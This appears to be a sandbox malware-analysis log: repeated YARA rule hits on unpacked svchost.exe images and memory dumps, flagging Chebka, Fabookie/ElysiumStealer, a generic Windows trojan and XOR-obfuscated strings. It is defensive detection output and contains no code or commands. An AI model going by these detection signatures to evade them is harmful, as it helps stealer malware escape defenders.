      Source: 26.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 31.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 31.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 31.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 35.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 35.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 35.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 20.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 20.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 20.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 21.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 21.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 21.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 36.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 36.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 36.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 37.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 37.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 37.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 36.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 36.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 36.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 31.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 31.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 31.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 26.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 26.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 26.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 34.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 20.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 20.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 20.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 34.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 34.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 15.2.svchost.exe.1b37c560000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 15.2.svchost.exe.1b37c560000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 15.2.svchost.exe.1b37c560000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 37.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 37.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 37.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 11.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 11.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 11.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 22.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 22.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 22.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 27.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 27.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 27.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 29.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 29.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 29.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 33.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 33.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 33.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 41.0.svchost.exe.2b6680f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 41.0.svchost.exe.2b6680f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 41.0.svchost.exe.2b6680f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001F.00000003.372989113.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001F.00000003.372989113.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000D.00000002.819358174.000001A74B240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: 0000000D.00000002.819358174.000001A74B240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000000D.00000003.428573699.000001A74A303000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001D.00000003.356780301.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001D.00000003.356780301.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000A.00000002.447857921.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000000A.00000002.447857921.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Fabookie author = ditekSHen, description = Detects Fabookie / ElysiumStealer
      Source: 0000000A.00000002.447857921.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000F.00000003.295812726.000001B37C4F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000000F.00000003.295812726.000001B37C4F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000018.00000003.326062202.000002468B540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000018.00000003.326062202.000002468B540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000021.00000003.380766591.000001E554180000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000021.00000003.380766591.000001E554180000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000D.00000003.310094531.000001A7480A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000D.00000002.802924831.000001A7480B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000000D.00000002.813505830.000001A74A300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000023.00000003.398762048.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000023.00000003.398762048.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000D.00000003.320925913.000001A7480A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000025.00000003.421573587.000002828E550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000025.00000003.421573587.000002828E550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
